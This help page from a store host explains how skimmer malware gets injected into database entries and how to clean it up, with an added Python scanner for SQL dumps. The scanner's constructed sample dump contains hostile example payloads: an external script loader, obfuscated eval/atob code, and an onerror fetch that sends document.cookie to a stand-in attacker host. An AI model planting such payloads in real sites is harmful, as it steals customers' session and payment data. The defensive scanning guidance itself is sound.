Suspicious database entries
The database contains suspicious entries.
We recommend having a malware-infected store checked by experienced developers or a security company.
When an online store is successfully compromised, the attacker usually leaves behind code of their own that adds functions to the store (for example, skimming personal data or payment data). Because manipulated files are now comparatively easy to detect (for instance with a version control system such as Git, which shows every change to tracked files), newer attacks place the malicious code in database entries instead. Typically these are entries whose content is rendered in the web browser, such as CMS elements or pages. The entry itself often only carries a small loader, e.g. a script tag that pulls the actual malicious code from an external server. Because the loader is embedded in a store page, the browser executes the code in the context of the store's own origin, so it can read cookies that are not flagged HttpOnly, capture form contents (e.g. from the checkout), and send them to the attacker.
Solution & protective measures
In addition to restoring a clean state by removing the malware, you should also analyze how the infection came about (e.g. by reviewing the recorded accesses to identify the entry vector) and what the malicious code actually did (e.g. which data it collected and where it sent it).
Analyzing database changes is much harder than analyzing file changes, because the database changes far more often and cannot simply be tracked by a version control system. If there are already signs of a malware attack within the database, you can export the entire database, including triggers and routines (which can also carry or re-create injected code), to a dump file, store it on the cluster and then start a new malware scan. The scan then checks the complete database contents for malware patterns via the dump file. Do not place the dump in a directory the web server can serve, and delete it once the scan is done.
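As an added example that is not part of the original page and not the hosting provider's own scanner, the following Python script shows what such a scan of a dump file can look like, and at the same time what the injected entries described above typically contain. It reads a mysqldump-style export (e.g. created with `mysqldump --single-transaction --routines --triggers --events`) line by line, remembers which table each INSERT statement writes to, and reports every row that loads a script from a host outside an allow list or contains constructs typical of injected skimmer code (eval/atob obfuscation, document.cookie access, inline event handlers, iframes). The dump content, the table names and the allow list are constructed for the example; the allow list in particular must be adapted to the scripts the store legitimately embeds.

```python
"""Scan a mysqldump-style SQL dump for malicious content stored in rows.

Added example, not the page's or the provider's own scanner. Table names,
dump content and the allow list below are constructed for illustration.
"""
import re
import sys
from collections import Counter
from dataclasses import dataclass

# Hosts from which the store legitimately loads scripts (assumed; adapt).
ALLOWED_SCRIPT_HOSTS = frozenset({"www.googletagmanager.com"})

INSERT_RE = re.compile(r"^INSERT\s+INTO\s+`?([\w.]+)`?", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(
    r"<script[^>]*\ssrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.IGNORECASE
)
# Constructs that practically never occur in legitimate CMS/page content.
SUSPICIOUS_RES = {
    "eval()": re.compile(r"\beval\s*\(", re.IGNORECASE),
    "atob()": re.compile(r"\batob\s*\(", re.IGNORECASE),
    "String.fromCharCode": re.compile(r"String\.fromCharCode", re.IGNORECASE),
    "document.cookie": re.compile(r"document\.cookie", re.IGNORECASE),
    "inline event handler": re.compile(r"\son(?:error|load|mouseover)\s*=", re.IGNORECASE),
    "iframe": re.compile(r"<iframe\b", re.IGNORECASE),
}


@dataclass
class Finding:
    table: str
    line_no: int
    reason: str
    snippet: str


def _snippet(line: str, start: int, end: int, width: int = 40) -> str:
    return line[max(0, start - width): end + width]


def scan_dump(dump_text: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> list[Finding]:
    """Return one Finding per suspicious construct, with the table it lives in."""
    findings: list[Finding] = []
    table = "<unknown>"
    for line_no, line in enumerate(dump_text.splitlines(), start=1):
        if line.startswith("--") or line.startswith("/*!"):
            continue  # mysqldump comments and version-conditional headers
        m = INSERT_RE.match(line)
        if m:
            table = m.group(1)  # the rows of an extended INSERT follow on this line
        for m in SCRIPT_SRC_RE.finditer(line):
            host = m.group(1).lower()
            if host not in allowed_hosts:
                findings.append(Finding(table, line_no, f"external script from {host}",
                                        _snippet(line, m.start(), m.end())))
        for reason, rx in SUSPICIOUS_RES.items():
            for m in rx.finditer(line):
                findings.append(Finding(table, line_no, reason,
                                        _snippet(line, m.start(), m.end())))
    return findings


def occurrences_per_table(findings: list[Finding]) -> dict[str, int]:
    """Cleanup checklist: every table listed here still has to be cleaned."""
    return dict(Counter(f.table for f in findings))


# Constructed sample dump (not a real export); note the mysqldump-style \' escaping.
SAMPLE_DUMP = r"""-- MySQL dump (constructed sample)
CREATE TABLE `cms_block` (`id` int, `name` varchar(64), `content` text);
INSERT INTO `cms_block` VALUES (1,'Footer','<p>Thanks for shopping</p>'),(2,'Checkout','<p>Pay</p><script src="https://cdn.example-evil.test/c.js"></script>');
INSERT INTO `cms_block` VALUES (3,'Analytics','<script src="https://www.googletagmanager.com/gtag/js"></script>');
INSERT INTO `cms_page` VALUES (7,'About','<p>Hi</p><script>eval(atob("ZG9jdW1lbnQuY29va2ll"))</script>');
INSERT INTO `product_translation` VALUES (3,'Shoes','<img src=x onerror="fetch(\'https://drop.example-evil.test/?c=\'+document.cookie)">');
"""


def main(argv: list[str]) -> int:
    # Scan the dump given on the command line, or the constructed sample.
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_DUMP
    findings = scan_dump(text)
    for f in findings:
        print(f"{f.table}:{f.line_no}: {f.reason}: {f.snippet!r}")
    print("occurrences per table:", occurrences_per_table(findings))
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against the real export with `python scan_dump.py dump.sql`. The per-table summary is the checklist of entries that all have to be cleaned, since one remaining copy is enough to reinfect the store. A pattern list like this catches the common loader and obfuscation constructs, not every possible variant; treat a clean result as a starting point for the manual review, not as proof that the database is clean.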
To clean up the database, every occurrence of the malicious code must be removed, because a single remaining copy is enough for the store to be reinfected. Often the only practical option is to restore a backup from before the attack, but then data created after that point (orders, customer accounts, content changes) is lost unless it is migrated separately.
If you want to migrate your store to a completely clean system, we will be happy to provide you with an additional independent cluster. Contact our consulting department for the conditions and the necessary procedure.
Further recommendations for action
The most common cause of malware infections we observe is running outdated software on a cluster. Besides the store system itself, other applications, such as the blog system or the database administration tool, may be outdated and therefore have publicly known security vulnerabilities. We therefore generally recommend the following:
- Install all security updates promptly, including those for plugins as well as additional software.
- If necessary, separate particularly critical systems, such as stores with customer data, from systems or development environments that may not be well maintained.
- Do not store backup files, database exports, log files etc. in directories accessible from the web server. These files may contain information that can easily be used to attack your applications.
- Use strong passwords that you do not already use elsewhere.